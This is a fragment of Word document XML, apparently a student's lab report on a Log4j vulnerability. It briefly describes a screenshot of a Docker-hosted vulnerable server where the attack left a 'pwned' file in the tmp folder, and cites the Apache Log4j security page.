    <w:p w14:paraId="3099748C" w14:textId="77777777" w:rsidR="00972D96" w:rsidRDefault="00972D96">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0C229C" w14:textId="46C28C9E" w:rsidR="00995345" w:rsidRPr="007E6DF9" w:rsidRDefault="005142CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6DF9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The file added from the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7C669" w14:textId="77777777" w:rsidR="007E6DF9" w:rsidRDefault="007E6DF9"/>
    <w:p w14:paraId="32D48CE9" w14:textId="006DBE4D" w:rsidR="005142CA" w:rsidRDefault="00995345">
      <w:r>
        <w:tab/>
        <w:t>This is a screen shot of the vulnerable server that was created in docker (you can see the command prompt window to the right that was referenced earlier) and a few commands to show the file directory. Note the second line from the very bottom “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00E571CB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this is the file that was added </w:t>
      </w:r>
      <w:r w:rsidR="00E571CB">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E571CB">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E571CB">
        <w:t xml:space="preserve"> folder </w:t>
      </w:r>
      <w:r>
        <w:t>from the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F023602" w14:textId="77777777" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1"/>
    <w:p w14:paraId="67C18977" w14:textId="5E37824F" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34F569C9" wp14:editId="5798574B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>257175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>252095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7419975" cy="5133975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21560"/>
                <wp:lineTo x="21572" y="21560"/>
                <wp:lineTo x="21572" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4" name="Picture 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B8828" w14:textId="5290BAE2" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1228134A" w14:textId="055F5613" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004CDBAF" w14:textId="77777777" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8AA5DE" w14:textId="48577530" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0182C05A" w14:textId="66DF2D52" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC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References </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA925C" w14:textId="1F5A6EAB" w:rsidR="001D1DC1" w:rsidRPr="001D1DC1" w:rsidRDefault="001D1DC1" w:rsidP="001D1DC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Apache Log4j Security Vulnerabilities. (2.23.2022). Logging Services. </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1DC1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://logging.apache.org/log4j/2.x/security.html</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001D1DC1" w:rsidRPr="001D1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78"/>
    <w:rsid w:val="001D1DC1"/>
    <w:rsid w:val="001E317C"/>
    <w:rsid w:val="001E3C42"/>
    <w:rsid w:val="00263C15"/>
    <w:rsid w:val="0031476D"/>
    <w:rsid w:val="003A6E9A"/>
    <w:rsid w:val="003B4893"/>
    <w:rsid w:val="005142CA"/>
    <w:rsid w:val="00515D8E"/>
    <w:rsid w:val="0060596B"/>
    <w:rsid w:val="00633678"/>
    <w:rsid w:val="006D441F"/>
    <w:rsid w:val="007E6DF9"/>
    <w:rsid w:val="007E7FF2"/>
    <w:rsid w:val="0082244C"/>
    <w:rsid w:val="00827D8A"/>
    <w:rsid w:val="00874DE8"/>
    <w:rsid w:val="00972D96"/>
    <w:rsid w:val="00995345"/>
    <w:rsid w:val="009D58AF"/>
    <w:rsid w:val="00A03FE5"/>
    <w:rsid w:val="00A05B73"/>
    <w:rsid w:val="00A340BF"/>
    <w:rsid w:val="00A93D55"/>
    <w:rsid w:val="00B770E8"/>
    <w:rsid w:val="00BC108E"/>
    <w:rsid w:val="00CD252A"/>
    <w:rsid w:val="00CF1070"/>
    <w:rsid w:val="00D31478"/>
    <w:rsid w:val="00D71CF3"/>
    <w:rsid w:val="00D83364"/>
    <w:rsid w:val="00DF593A"/>
    <w:rsid w:val="00E01683"/>
    <w:rsid w:val="00E23154"/>
    <w:rsid w:val="00E43A34"/>
    <w:rsid w:val="00E571CB"/>
    <w:rsid w:val="00ED088D"/>
    <w:rsid w:val="00ED7E42"/>
    <w:rsid w:val="00F363D2"/>
    <w:rsid w:val="00F652C3"/>
    <w:rsid w:val="00F65324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E339B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5E954FF-2B94-4F86-B510-58446858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McPeak, Derek (dmcpeak2@student.cccs.edu)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>McPeak, Derek (dmcpeak2@student.cccs.edu)</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-28T18:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-13T23:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>